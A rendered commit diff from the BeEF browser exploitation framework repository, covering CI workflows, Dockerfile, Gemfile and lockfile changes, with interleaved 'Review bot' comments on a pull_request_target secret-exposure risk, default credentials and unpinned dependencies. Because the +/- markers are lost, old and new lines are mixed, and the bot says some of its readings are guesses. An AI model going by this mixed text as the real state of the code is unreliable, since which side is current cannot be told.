1 Commits

Author SHA1 Message Date
jcrew99
15b6bf25a8 Revert "Revert "Add support for the SuSE family in the installer (#2590)" (#2594)"
This reverts commit dc9e41c55a.
2022-10-13 13:31:38 +10:00
1482 changed files with 52411 additions and 30060 deletions


@@ -1,3 +1,2 @@
---
BUNDLE_WITHOUT: "development:test"
BUNDLE_WITH: "geoip:ext_msf:ext_notifications:ext_dns:ext_qrcode"


@@ -4,5 +4,6 @@
.gitignore
doc
docs
scripts
test
update-beef
update-beef


@@ -1,8 +1,3 @@
---
name: Bug report
about: Report a bug to help us improve BeEF
---
## First Steps
1. Confirm that your issue has not been posted previously by searching here: https://github.com/beefproject/beef/issues
@@ -31,7 +26,6 @@ about: Report a bug to help us improve BeEF
2. Update `client_debug` to `true`
3. Retrieve browser logs from your browser's developer console (Ctrl + Shift + I or F12 depending on browser)
4. Retrieve your server-side logs from `~/.beef/beef.log`
* If you have a kali (beef-xss) problem, you can submit a bug here:
https://www.kali.org/docs/community/submitting-issues-kali-bug-tracker/
* If using **beef-xss** logs found with `journalctl -u beef-xss`
**If we request additional information and we don't hear back from you within a week, we will be closing the ticket off.**


@@ -1,5 +0,0 @@
blank_issues_enabled: false
contact_links:
- name: Questions / Support
url: https://github.com/beefproject/beef/wiki
about: Please check the wiki before opening an issue.


@@ -1,26 +0,0 @@
name: Dependabot auto-merge
on:
pull_request:
branches:
- master
permissions:
contents: write
pull-requests: write
jobs:
dependabot:
runs-on: ubuntu-latest
if: github.event.pull_request.user.login == 'dependabot[bot]' && github.repository == 'beefproject/beef'
steps:
- name: Dependabot metadata
id: metadata
uses: dependabot/fetch-metadata@v2
with:
github-token: "${{ secrets.GITHUB_TOKEN }}"
- name: Enable auto-merge for Dependabot PRs
if: success() && (steps.metadata.outputs.update-type == 'version-update:semver-minor' || steps.metadata.outputs.update-type == 'version-update:semver-patch')
run: gh pr merge --auto --merge "$PR_URL"
env:
PR_URL: ${{ github.event.pull_request.html_url }}
GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}


@@ -2,34 +2,25 @@ name: 'BrowserStack Test'
on:
pull_request_target:
types: [opened, synchronize, reopened, labeled]
branches: [ master ]
jobs:
approve:
runs-on: ubuntu-latest
jobs:
steps:
- name: Approve
run: echo For security reasons, all pull requests need to be approved first before running any automated CI.
ubuntu-job:
name: 'BrowserStack Test on Ubuntu'
if: contains(github.event.pull_request.labels.*.name, 'safe-to-test')
runs-on: ubuntu-latest # Can be self-hosted runner also
permissions:
contents: read
pull-requests: write
environment:
name: Integrate Pull Request
env:
GITACTIONS: true
steps:
- name: 'Remove safe-to-test label'
uses: actions/github-script@v6
with:
script: |
github.rest.issues.removeLabel({
owner: context.repo.owner,
repo: context.repo.repo,
issue_number: context.issue.number,
name: 'safe-to-test'
})
- name: 'BrowserStack Env Setup' # Invokes the setup-env action
uses: browserstack/github-actions/setup-env@master
with:
@@ -43,29 +34,26 @@ jobs:
local-identifier: random
- name: 'Checkout the repository'
uses: actions/checkout@v4
uses: actions/checkout@v2
with:
ref: ${{ github.event.pull_request.head.sha }}
fetch-depth: 2
- name: 'Setting up Ruby'
uses: ruby/setup-ruby@v1
# Ruby version is defined in .ruby-version file
with:
ruby-version: 3.0.3 # Not needed with a .ruby-version file
- name: 'Update and Install Dependencies'
- name: 'Build and run tests'
run: |
sudo apt update
sudo apt install libcurl4 libcurl4-openssl-dev
- name: 'Configure Bundle testing and install gems'
run: |
bundle config unset --local without
bundle config set --local with 'test' 'development'
bundle install
- name: 'Run BrowserStack simple verification'
run: |
bundle exec rake browserstack --trace
- name: 'BrowserStackLocal Stop' # Terminating the BrowserStackLocal tunnel connection
uses: browserstack/github-actions/setup-local@master
with:
local-testing: stop
local-testing: stop
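Review bot: Code from the pull request branch runs with access to the base repository's token and secrets, because the workflow triggers on `pull_request_target`, checks out `ref: ${{ github.event.pull_request.head.sha }}` and then runs `bundle install` and `bundle exec rake browserstack` from that checkout. The only gates visible in this section are the `safe-to-test` label condition and the `Integrate Pull Request` environment. The +/- markers are lost in this rendering, so it is not certain that the `permissions:` block and the 'Remove safe-to-test label' step survive on the new side; without the label removal, one labelling would keep authorising every later push to the same pull request. Keep both, and pin the third-party actions to a full commit SHA rather than a moving branch, e.g. `uses: browserstack/github-actions/setup-env@<full-commit-sha>` in place of `@master`.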


@@ -21,10 +21,10 @@ jobs:
- uses: actions/stale@v5
with:
repo-token: ${{ secrets.GITHUB_TOKEN }}
days-before-stale: 14
days-before-pr-stale: 29
days-before-close: 11
days-before-pr-close: 31
days-before-stale: 7
days-before-pr-stale: 14
days-before-close: 7
days-before-pr-close: 14
stale-issue-message: 'This issue as been marked as stale due to inactivity and will be closed in 7 days'
stale-pr-message: 'Stale pull request message'
stale-issue-label: 'Stale'

8
.gitignore vendored

@@ -1,7 +1,5 @@
### BeEF ###
beef.db
beef.db-shm
beef.db-wal
beef.log
test/msf-test
extensions/admin_ui/media/javascript-min/
@@ -27,9 +25,6 @@ coverage/
# BrowserStack
local.log
# Visual Studio Code
.vscode/
# The following lines were created by https://www.gitignore.io
### Linux ###
@@ -131,6 +126,3 @@ node_modules/
# Generated files
out/
doc/rdoc/
# Secrets for testing github actions locally
.secrets


@@ -4,7 +4,7 @@ AllCops:
- 'tmp/**/*'
- 'tools/**/*'
- 'doc/**/*'
TargetRubyVersion: <%= File.read(".ruby-version").strip[/^(\d+\.\d+)/, 1] || raise("Ruby version not found") %>
TargetRubyVersion: 3.0
NewCops: enable
Layout/LineLength:


@@ -1 +1 @@
3.4.7
3.0.3


@@ -0,0 +1,49 @@
{
"id": "3b5f29e6-c8eb-4d23-bf52-c01255f22f08",
"name": "BeEF",
"values": [
{
"key": "hostname",
"value": "127.0.0.1",
"enabled": true
},
{
"key": "username",
"value": "beef",
"enabled": true
},
{
"key": "password",
"value": "beef",
"enabled": true
},
{
"key": "token",
"value": "",
"enabled": true
},
{
"key": "session",
"value": "",
"enabled": true
},
{
"key": "module_id",
"value": "",
"enabled": true
},
{
"key": "cmd_id",
"value": "",
"enabled": true
},
{
"key": "dnsrule_id",
"value": "",
"enabled": true
}
],
"_postman_variable_scope": "environment",
"_postman_exported_at": "2020-01-03T06:00:29.827Z",
"_postman_exported_using": "Postman/7.14.0"
}
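Review bot: The committed environment sets `username` and `password` to `beef`, the default pair that the Dockerfile comment block in this same comparison says BeEF refuses to authenticate with, so the login request cannot succeed until the values are edited. Keeping a filled-in credential pair in a tracked file also encourages users to put their real password there. Ship both entries empty, as `token` and `session` already are (`"value": ""`), and let each user set them in their local Postman environment.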


@@ -1,109 +1,63 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
###########################################################################################################
###########################################################################################################
## ##
## Please read the Wiki Installation section on set-up using Docker prior to building this container. ##
## BeEF does NOT allow authentication with default credentials. So please, at the very least ##
## change the username:password in the config.yaml file to something secure that is not beef:beef ##
## before building or you will be denied access and have to rebuild anyway. ##
## before building or you will to denied access and have to rebuild anyway. ##
## ##
###########################################################################################################
###########################################################################################################
# ---------------------------- Start of Builder 0 - Gemset Build ------------------------------------------
FROM ruby:3.4.7-slim-bookworm AS builder
FROM ruby:2.7.5-alpine AS builder
LABEL maintainer="Beef Project: github.com/beefproject/beef"
# Install gems in parallel with 4 workers to expedite build process.=
ARG BUNDLER_ARGS="--jobs=4"
# Set gemrc config to install gems without Ruby Index (ri) and Ruby Documentation (rdoc) files
RUN echo "gem: --no-ri --no-rdoc" > /etc/gemrc
COPY . /beef
# Set gemrc config to install gems without Ruby Index (ri) and Ruby Documentation (rdoc) files.
# Then add bundler/gem dependencies and install.
# Finally change permissions of bundle installs so we don't need to run as root.
RUN echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& apt-get update \
&& apt-get install -y --no-install-recommends \
git \
curl \
libssl-dev \
xz-utils \
pkg-config \
make \
g++ \
libcurl4-openssl-dev \
ruby-dev \
libyaml-dev \
libffi-dev \
zlib1g-dev \
libsqlite3-dev \
sqlite3 \
&& bundle install --gemfile=/beef/Gemfile --jobs=`nproc` \
&& rm -rf /usr/local/bundle/cache \
&& chmod -R a+r /usr/local/bundle \
&& rm -rf /var/lib/apt/lists/*
# Add bundler/gem dependencies and then install
RUN apk add --no-cache git curl libcurl curl-dev ruby-dev libffi-dev make g++ gcc musl-dev zlib-dev sqlite-dev && \
bundle install --gemfile=/beef/Gemfile $BUNDLER_ARGS && \
# Temp fix for https://github.com/bundler/bundler/issues/6680
rm -rf /usr/local/bundle/cache
WORKDIR /beef
# So we don't need to run as root
RUN chmod -R a+r /usr/local/bundle
# ------------------------------------- End of Builder 0 -------------------------------------------------
# ---------------------------- Start of Builder 1 - Final Build ------------------------------------------
FROM ruby:3.4.7-slim-bookworm
LABEL maintainer="Beef Project" \
source_url="github.com/beefproject/beef" \
homepage="https://beefproject.com/"
FROM ruby:2.7.5-alpine
LABEL maintainer="Beef Project: github.com/beefproject/beef"
# BeEF UI/Hook port
ARG UI_PORT=3000
ARG PROXY_PORT=6789
ARG WEBSOCKET_PORT=61985
ARG WEBSOCKET_SECURE_PORT=61986
# Create service account to run BeEF
RUN adduser -h /beef -g beef -D beef
# Create service account to run BeEF and install BeEF's runtime dependencies
RUN adduser --home /beef --gecos beef --disabled-password beef \
&& apt-get update \
&& apt-get install -y --no-install-recommends \
curl \
wget \
espeak \
lame \
openssl \
libreadline-dev \
libyaml-dev \
libxml2-dev \
libxslt-dev \
libncurses5-dev \
libsqlite3-dev \
sqlite3 \
zlib1g \
bison \
nodejs \
firefox-esr \
&& apt-get -y clean \
&& rm -rf /var/lib/apt/lists/*
# Install geckodriver for Selenium tests
# Pin version and verify checksum to mitigate supply chain attacks
ENV GECKODRIVER_VERSION=v0.36.0
ENV GECKODRIVER_SHA256=0bde38707eb0a686a20c6bd50f4adcc7d60d4f73c60eb83ee9e0db8f65823e04
RUN wget -q "https://github.com/mozilla/geckodriver/releases/download/${GECKODRIVER_VERSION}/geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" \
&& echo "${GECKODRIVER_SHA256} geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" | sha256sum -c - \
&& tar -xzf "geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" -C /usr/local/bin \
&& chmod +x /usr/local/bin/geckodriver \
&& rm "geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz"
COPY --chown=1000:1000 . /beef
# Use gemset created by the builder above
COPY --chown=beef:beef . /beef
COPY --from=builder /usr/local/bundle /usr/local/bundle
# Install BeEF's runtime dependencies
RUN apk add --no-cache curl git build-base openssl readline-dev zlib zlib-dev libressl-dev yaml-dev sqlite-dev sqlite libxml2-dev libxslt-dev autoconf libc6-compat ncurses automake libtool bison nodejs
WORKDIR /beef
# Ensure we are using our service account by default
USER beef
# Expose UI, Proxy, WebSocket server, and WebSocketSecure server ports
EXPOSE $UI_PORT $PROXY_PORT $WEBSOCKET_PORT $WEBSOCKET_SECURE_PORT
# Expose UI, Proxy, WebSocket server, and WebSocketSecure server
EXPOSE 3000 6789 61985 61986
HEALTHCHECK --interval=30s --timeout=30s --start-period=5s --retries=3 CMD [ "curl", "-fS", "localhost:$UI_PORT" ]
HEALTHCHECK --interval=30s --timeout=30s --start-period=5s --retries=3 CMD [ "curl", "-fS", "localhost:3000" ]
WORKDIR /beef
ENTRYPOINT ["/beef/beef"]
# ------------------------------------- End of Builder 1 -------------------------------------------------
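Review bot: The final stage's `RUN apk add --no-cache ...` line installs a build toolchain (`build-base`, `autoconf`, `automake`, `libtool`, `bison`) and `git` into the runtime image, although the gems are already brought in with `COPY --from=builder /usr/local/bundle /usr/local/bundle`. That leaves compilers and git available inside the container that serves the UI and hook ports. Unless a gem compiles at run time, the runtime list should be cut to the shared libraries the gems link against. The base tag `ruby:2.7.5-alpine` also disagrees with the `3.0.3` that `.ruby-version` and the BrowserStack workflow carry in this comparison. The +/- markers are lost on this page; the `apk`/alpine lines are read as the new side from the `+1,63` count in the hunk header.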

108
Gemfile

@@ -1,90 +1,90 @@
#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
#gem 'simplecov', require: false, group: :test
gem 'net-smtp', require: false
gem 'json'
gem 'eventmachine', '~> 1.2', '>= 1.2.7'
gem 'thin', '~> 2.0'
gem 'sinatra', '~> 4.1'
gem 'rack', '~> 3.2'
gem 'rack-protection', '~> 4.2.1'
gem 'em-websocket', '~> 0.5.3' # WebSocket support
gem 'uglifier', '~> 4.2'
gem 'mime-types', '~> 3.7'
gem 'execjs', '~> 2.10'
gem 'ansi', '~> 1.5'
gem 'eventmachine'
gem 'thin'
gem 'sinatra', '>= 2.2.0'
gem 'rack', '>= 2.2.4'
gem 'rack-protection', '>= 2.2.0'
gem 'em-websocket' # WebSocket support
gem 'uglifier', '>= 4.2.0'
gem 'mime-types'
gem 'execjs'
gem 'ansi'
gem 'term-ansicolor', :require => 'term/ansicolor'
gem 'rubyzip', '~> 3.2'
gem 'espeak-ruby', '~> 1.1.0' # Text-to-Voice
gem 'rake', '~> 13.3'
gem 'activerecord', '~> 8.1'
gem 'otr-activerecord', '~> 2.6.0'
gem 'sqlite3', '~> 2.9'
gem 'rubocop', '~> 1.82.1', require: false
gem 'json'
gem 'rubyzip', '>= 1.2.2'
gem 'espeak-ruby', '>= 1.0.4' # Text-to-Voice
gem 'rake', '>= 13.0'
gem 'otr-activerecord', '>= 1.4.2'
gem 'sqlite3'
gem 'rubocop', '~> 1.36.0', require: false
# Geolocation support
group :geoip do
gem 'maxmind-db', '~> 1.4'
gem 'maxmind-db'
end
gem 'parseconfig', '~> 1.1', '>= 1.1.2'
gem 'erubis', '~> 2.7'
gem 'parseconfig'
gem 'erubis'
# Metasploit Integration extension
group :ext_msf do
gem 'msfrpc-client', '~> 1.1', '>= 1.1.2'
gem 'xmlrpc', '~> 0.3.3'
gem 'msfrpc-client'
gem 'xmlrpc'
end
# Notifications extension
group :ext_notifications do
gem 'unf'
gem 'domain_name', '>= 0.5.20190701'
# Pushover
gem 'rushover', '~> 0.3.0'
gem 'rushover'
# Slack
gem 'slack-notifier', '~> 2.4'
gem 'slack-notifier'
# Twitter
gem 'twitter', '>= 7.0.0'
end
# DNS extension
group :ext_dns do
gem 'async-dns', '~> 1.4'
gem 'async', '~> 1.32'
gem 'async-dns'
end
# QRcode extension
group :ext_qrcode do
gem 'qr4r', '~> 0.6.1'
gem 'qr4r'
end
# For running unit tests
group :test do
gem 'test-unit-full', '~> 0.0.5'
gem 'rspec', '~> 3.13'
gem 'rdoc', '~> 7.1'
gem 'browserstack-local', '~> 1.4'
gem 'irb', '~> 1.16'
gem 'pry-byebug', '~> 3.12'
gem 'rest-client', '~> 2.1.0'
gem 'websocket-client-simple', '~> 0.6.1'
# Note: curb gem requires curl libraries
# sudo apt-get install libcurl4-openssl-dev
gem 'curb', '~> 1.2'
# Note: selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
# gem 'selenium' # Requires old version of selenium which is no longer available
gem 'geckodriver-helper', '~> 0.24.0'
gem 'selenium-webdriver', '~> 4.40'
# Note: nokogiri is needed by capybara which may require one of the below commands
# sudo apt-get install libxslt-dev libxml2-dev
# sudo port install libxml2 libxslt
gem 'capybara', '~> 3.40'
gem 'test-unit'
gem 'test-unit-full'
gem 'rspec'
gem 'rdoc'
# curb gem requires curl libraries
# sudo apt-get install libcurl4-openssl-dev
gem 'curb'
# selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
# gem 'selenium' # Requires old version of selenium which is no longer available
gem 'geckodriver-helper'
gem 'selenium-webdriver'
# nokogirl is needed by capybara which may require one of the below commands
# sudo apt-get install libxslt-dev libxml2-dev
# sudo port install libxml2 libxslt
gem 'capybara'
# RESTful API tests/generic command module tests
gem 'rest-client', '>= 2.1.0'
gem 'irb'
gem 'pry-byebug'
gem "websocket-client-simple", "~> 0.6.0"
gem "browserstack-local", "~> 1.4"
end
source 'https://rubygems.org'
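Review bot: Most entries on the new side carry no upper bound, either bare (`gem 'thin'`, `gem 'sqlite3'`) or with a floor only (`gem 'rack', '>= 2.2.4'`), so a `bundle update` or an install without the lockfile can move a web-facing dependency to a new major version without anyone choosing it. A pessimistic constraint keeps the floor and bounds the series, for example `gem 'rack', '~> 2.2', '>= 2.2.4'`. The +/- markers are lost in this rendering; the unconstrained lines are taken as the new side because they sit with the 2006-2022 copyright header.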


@@ -1,250 +1,206 @@
GEM
remote: https://rubygems.org/
specs:
activemodel (8.1.2)
activesupport (= 8.1.2)
activerecord (8.1.2)
activemodel (= 8.1.2)
activesupport (= 8.1.2)
timeout (>= 0.4.0)
activesupport (8.1.2)
base64
bigdecimal
concurrent-ruby (~> 1.0, >= 1.3.1)
connection_pool (>= 2.2.5)
drb
activemodel (7.0.3.1)
activesupport (= 7.0.3.1)
activerecord (7.0.3.1)
activemodel (= 7.0.3.1)
activesupport (= 7.0.3.1)
activesupport (7.0.3.1)
concurrent-ruby (~> 1.0, >= 1.0.2)
i18n (>= 1.6, < 2)
json
logger (>= 1.4.2)
minitest (>= 5.1)
securerandom (>= 0.3)
tzinfo (~> 2.0, >= 2.0.5)
uri (>= 0.13.1)
addressable (2.8.7)
public_suffix (>= 2.0.2, < 7.0)
tzinfo (~> 2.0)
addressable (2.8.0)
public_suffix (>= 2.0.2, < 5.0)
ansi (1.5.0)
archive-zip (0.13.1)
io-like (~> 0.4.0)
ast (2.4.3)
async (1.32.1)
archive-zip (0.12.0)
io-like (~> 0.3.0)
ast (2.4.2)
async (1.30.3)
console (~> 1.10)
nio4r (~> 2.3)
timers (~> 4.1)
async-dns (1.4.1)
async-dns (1.3.0)
async-io (~> 1.15)
async-io (1.33.0)
async
io-endpoint
base64 (0.3.0)
bigdecimal (4.0.1)
browserstack-local (1.4.3)
byebug (13.0.0)
reline (>= 0.6.0)
capybara (3.40.0)
browserstack-local (1.4.0)
buftok (0.2.0)
byebug (11.1.3)
capybara (3.37.1)
addressable
matrix
mini_mime (>= 0.1.3)
nokogiri (~> 1.11)
nokogiri (~> 1.8)
rack (>= 1.6.0)
rack-test (>= 0.6.3)
regexp_parser (>= 1.5, < 3.0)
xpath (~> 3.2)
childprocess (4.1.0)
coderay (1.1.3)
concurrent-ruby (1.3.6)
connection_pool (3.0.2)
console (1.34.0)
fiber-annotation
fiber-local (~> 1.1)
json
curb (1.2.2)
concurrent-ruby (1.1.10)
console (1.15.3)
fiber-local
curb (1.0.1)
daemons (1.4.1)
date (3.5.1)
diff-lcs (1.6.2)
domain_name (0.6.20240107)
drb (2.2.3)
diff-lcs (1.5.0)
domain_name (0.5.20190701)
unf (>= 0.0.5, < 1.0.0)
em-websocket (0.5.3)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0)
erb (6.0.1)
equalizer (0.0.11)
erubis (2.7.0)
espeak-ruby (1.1.0)
event_emitter (0.2.6)
eventmachine (1.2.7)
execjs (2.10.0)
fiber-annotation (0.2.0)
fiber-local (1.1.0)
fiber-storage
fiber-storage (1.0.1)
execjs (2.8.1)
ffi (1.15.5)
ffi-compiler (1.0.1)
ffi (>= 1.0.0)
rake
fiber-local (1.0.0)
geckodriver-helper (0.24.0)
archive-zip (~> 0.7)
hashie (5.0.0)
hashie-forbidden_attributes (0.1.1)
hashie (>= 3.0)
http (4.4.1)
addressable (~> 2.3)
http-cookie (~> 1.0)
http-form_data (~> 2.2)
http-parser (~> 1.2.0)
http-accept (1.7.0)
http-cookie (1.0.8)
http-cookie (1.0.5)
domain_name (~> 0.5)
http_parser.rb (0.8.0)
i18n (1.14.8)
http-form_data (2.3.0)
http-parser (1.2.3)
ffi-compiler (>= 1.0, < 2.0)
http_parser.rb (0.6.0)
i18n (1.12.0)
concurrent-ruby (~> 1.0)
io-console (0.8.2)
io-endpoint (0.15.2)
io-like (0.4.0)
irb (1.16.0)
pp (>= 0.6.0)
rdoc (>= 4.0.0)
reline (>= 0.4.2)
json (2.18.0)
language_server-protocol (3.17.0.5)
lint_roller (1.1.0)
logger (1.7.0)
matrix (0.4.3)
maxmind-db (1.4.0)
method_source (1.1.0)
mime-types (3.7.0)
logger
mime-types-data (~> 3.2025, >= 3.2025.0507)
mime-types-data (3.2025.0902)
mini_mime (1.1.5)
minitest (6.0.1)
prism (~> 1.5)
mojo_magick (0.6.8)
io-console (0.5.11)
io-like (0.3.1)
irb (1.4.2)
reline (>= 0.3.0)
json (2.6.2)
matrix (0.4.2)
maxmind-db (1.1.1)
memoizable (0.4.2)
thread_safe (~> 0.3, >= 0.3.1)
method_source (1.0.0)
mime-types (3.4.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2022.0105)
mini_mime (1.1.2)
minitest (5.16.2)
mojo_magick (0.6.7)
msfrpc-client (1.1.2)
msgpack (~> 1)
msgpack (1.8.0)
mustermann (3.0.4)
msgpack (1.5.4)
multipart-post (2.2.3)
mustermann (3.0.0)
ruby2_keywords (~> 0.0.1)
net-protocol (0.2.2)
naught (1.1.0)
net-protocol (0.1.3)
timeout
net-smtp (0.5.1)
net-smtp (0.3.2)
net-protocol
netrc (0.11.0)
nio4r (2.7.4)
nokogiri (1.18.9-aarch64-linux-gnu)
nio4r (2.5.8)
nokogiri (1.13.8-x86_64-linux)
racc (~> 1.4)
nokogiri (1.18.9-aarch64-linux-musl)
racc (~> 1.4)
nokogiri (1.18.9-arm-linux-gnu)
racc (~> 1.4)
nokogiri (1.18.9-arm-linux-musl)
racc (~> 1.4)
nokogiri (1.18.9-arm64-darwin)
racc (~> 1.4)
nokogiri (1.18.9-x86_64-darwin)
racc (~> 1.4)
nokogiri (1.18.9-x86_64-linux-gnu)
racc (~> 1.4)
nokogiri (1.18.9-x86_64-linux-musl)
racc (~> 1.4)
otr-activerecord (2.6.0)
activerecord (>= 6.0, < 9.0)
parallel (1.27.0)
otr-activerecord (2.1.1)
activerecord (>= 4.0, < 7.1)
hashie-forbidden_attributes (~> 0.1)
parallel (1.22.1)
parseconfig (1.1.2)
parser (3.3.10.0)
parser (3.1.2.1)
ast (~> 2.4.1)
racc
power_assert (2.0.5)
pp (0.6.3)
prettyprint
prettyprint (0.2.0)
prism (1.7.0)
pry (0.16.0)
power_assert (2.0.1)
pry (0.14.1)
coderay (~> 1.1)
method_source (~> 1.0)
reline (>= 0.6.0)
pry-byebug (3.12.0)
byebug (~> 13.0)
pry (>= 0.13, < 0.17)
psych (5.3.1)
date
pry-byebug (3.10.1)
byebug (~> 11.0)
pry (>= 0.13, < 0.15)
psych (4.0.4)
stringio
public_suffix (6.0.2)
qr4r (0.6.2)
public_suffix (4.0.7)
qr4r (0.6.1)
mojo_magick (~> 0.6.5)
rqrcode_core (~> 1.0)
racc (1.8.1)
rack (3.2.4)
rack-protection (4.2.1)
base64 (>= 0.1.0)
logger (>= 1.6.0)
rack (>= 3.0.0, < 4)
rack-session (2.1.1)
base64 (>= 0.1.0)
rack (>= 3.0.0)
rack-test (2.2.0)
rqrcode_core (~> 0.1)
racc (1.6.0)
rack (2.2.4)
rack-protection (3.0.2)
rack
rack-test (2.0.2)
rack (>= 1.3)
rainbow (3.1.1)
rake (13.3.1)
rdoc (7.1.0)
erb
rake (13.0.6)
rdoc (6.4.0)
psych (>= 4.0.0)
tsort
regexp_parser (2.11.3)
reline (0.6.3)
regexp_parser (2.5.0)
reline (0.3.1)
io-console (~> 0.5)
rest-client (2.1.0)
http-accept (>= 1.7.0, < 2.0)
http-cookie (>= 1.0.2, < 2.0)
mime-types (>= 1.16, < 4.0)
netrc (~> 0.8)
rexml (3.4.4)
rqrcode_core (1.2.0)
rr (3.1.2)
rspec (3.13.2)
rspec-core (~> 3.13.0)
rspec-expectations (~> 3.13.0)
rspec-mocks (~> 3.13.0)
rspec-core (3.13.6)
rspec-support (~> 3.13.0)
rspec-expectations (3.13.5)
rexml (3.2.5)
rqrcode_core (0.2.0)
rr (3.1.0)
rspec (3.11.0)
rspec-core (~> 3.11.0)
rspec-expectations (~> 3.11.0)
rspec-mocks (~> 3.11.0)
rspec-core (3.11.0)
rspec-support (~> 3.11.0)
rspec-expectations (3.11.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.13.0)
rspec-mocks (3.13.6)
rspec-support (~> 3.11.0)
rspec-mocks (3.11.1)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.13.0)
rspec-support (3.13.6)
rubocop (1.82.1)
rspec-support (~> 3.11.0)
rspec-support (3.11.0)
rubocop (1.36.0)
json (~> 2.3)
language_server-protocol (~> 3.17.0.2)
lint_roller (~> 1.1.0)
parallel (~> 1.10)
parser (>= 3.3.0.2)
parser (>= 3.1.2.1)
rainbow (>= 2.2.2, < 4.0)
regexp_parser (>= 2.9.3, < 3.0)
rubocop-ast (>= 1.48.0, < 2.0)
regexp_parser (>= 1.8, < 3.0)
rexml (>= 3.2.5, < 4.0)
rubocop-ast (>= 1.20.1, < 2.0)
ruby-progressbar (~> 1.7)
unicode-display_width (>= 2.4.0, < 4.0)
rubocop-ast (1.48.0)
parser (>= 3.3.7.2)
prism (~> 1.4)
ruby-progressbar (1.13.0)
unicode-display_width (>= 1.4.0, < 3.0)
rubocop-ast (1.21.0)
parser (>= 3.1.1.0)
ruby-progressbar (1.11.0)
ruby2_keywords (0.0.5)
rubyzip (3.2.2)
rubyzip (2.3.2)
rushover (0.3.0)
json
rest-client
securerandom (0.4.1)
selenium-webdriver (4.40.0)
base64 (~> 0.2)
logger (~> 1.4)
selenium-webdriver (4.5.0)
childprocess (>= 0.5, < 5.0)
rexml (~> 3.2, >= 3.2.5)
rubyzip (>= 1.2.2, < 4.0)
rubyzip (>= 1.2.2, < 3.0)
websocket (~> 1.0)
sinatra (4.2.1)
logger (>= 1.6.0)
simple_oauth (0.3.1)
sinatra (3.0.2)
mustermann (~> 3.0)
rack (>= 3.0.0, < 4)
rack-protection (= 4.2.1)
rack-session (>= 2.0.0, < 3)
rack (~> 2.2, >= 2.2.4)
rack-protection (= 3.0.2)
tilt (~> 2.0)
slack-notifier (2.4.0)
sqlite3 (2.9.0-aarch64-linux-gnu)
sqlite3 (2.9.0-aarch64-linux-musl)
sqlite3 (2.9.0-arm-linux-gnu)
sqlite3 (2.9.0-arm-linux-musl)
sqlite3 (2.9.0-arm64-darwin)
sqlite3 (2.9.0-x86_64-darwin)
sqlite3 (2.9.0-x86_64-linux-gnu)
sqlite3 (2.9.0-x86_64-linux-musl)
stringio (3.2.0)
sqlite3 (1.5.3-x86_64-linux)
stringio (3.0.2)
sync (0.5.0)
term-ansicolor (1.11.3)
tins (~> 1)
test-unit (3.7.0)
term-ansicolor (1.7.1)
tins (~> 1.0)
test-unit (3.5.5)
power_assert
test-unit-context (0.5.1)
test-unit (>= 2.4.0)
@@ -261,89 +217,93 @@ GEM
test-unit (>= 2.5.2)
test-unit-runner-tap (1.1.2)
test-unit
thin (2.0.1)
thin (1.8.1)
daemons (~> 1.0, >= 1.0.9)
eventmachine (~> 1.0, >= 1.0.4)
logger
rack (>= 1, < 4)
tilt (2.6.1)
timeout (0.6.0)
timers (4.4.0)
tins (1.43.0)
bigdecimal
rack (>= 1, < 3)
thread_safe (0.3.6)
tilt (2.0.11)
timeout (0.3.0)
timers (4.3.3)
tins (1.31.1)
sync
tsort (0.2.0)
tzinfo (2.0.6)
twitter (7.0.0)
addressable (~> 2.3)
buftok (~> 0.2.0)
equalizer (~> 0.0.11)
http (~> 4.0)
http-form_data (~> 2.0)
http_parser.rb (~> 0.6.0)
memoizable (~> 0.4.0)
multipart-post (~> 2.0)
naught (~> 1.0)
simple_oauth (~> 0.3.0)
tzinfo (2.0.5)
concurrent-ruby (~> 1.0)
uglifier (4.2.1)
uglifier (4.2.0)
execjs (>= 0.3.0, < 3)
unicode-display_width (3.2.0)
unicode-emoji (~> 4.1)
unicode-emoji (4.2.0)
uri (1.1.1)
webrick (1.9.1)
websocket (1.2.11)
websocket-client-simple (0.6.1)
unf (0.1.4)
unf_ext
unf_ext (0.0.8.2)
unicode-display_width (2.2.0)
webrick (1.7.0)
websocket (1.2.9)
websocket-client-simple (0.6.0)
event_emitter
websocket
xmlrpc (0.3.3)
xmlrpc (0.3.2)
webrick
xpath (3.2.0)
nokogiri (~> 1.8)
PLATFORMS
aarch64-linux-gnu
aarch64-linux-musl
arm-linux-gnu
arm-linux-musl
arm64-darwin
x86_64-darwin
x86_64-linux-gnu
x86_64-linux-musl
x86_64-linux
DEPENDENCIES
activerecord (~> 8.1)
ansi (~> 1.5)
async (~> 1.32)
async-dns (~> 1.4)
ansi
async-dns
browserstack-local (~> 1.4)
capybara (~> 3.40)
curb (~> 1.2)
em-websocket (~> 0.5.3)
erubis (~> 2.7)
espeak-ruby (~> 1.1.0)
eventmachine (~> 1.2, >= 1.2.7)
execjs (~> 2.10)
geckodriver-helper (~> 0.24.0)
irb (~> 1.16)
capybara
curb
domain_name (>= 0.5.20190701)
em-websocket
erubis
espeak-ruby (>= 1.0.4)
eventmachine
execjs
geckodriver-helper
irb
json
maxmind-db (~> 1.4)
mime-types (~> 3.7)
msfrpc-client (~> 1.1, >= 1.1.2)
maxmind-db
mime-types
msfrpc-client
net-smtp
otr-activerecord (~> 2.6.0)
parseconfig (~> 1.1, >= 1.1.2)
pry-byebug (~> 3.12)
qr4r (~> 0.6.1)
rack (~> 3.2)
rack-protection (~> 4.2.1)
rake (~> 13.3)
rdoc (~> 7.1)
rest-client (~> 2.1.0)
rspec (~> 3.13)
rubocop (~> 1.82.1)
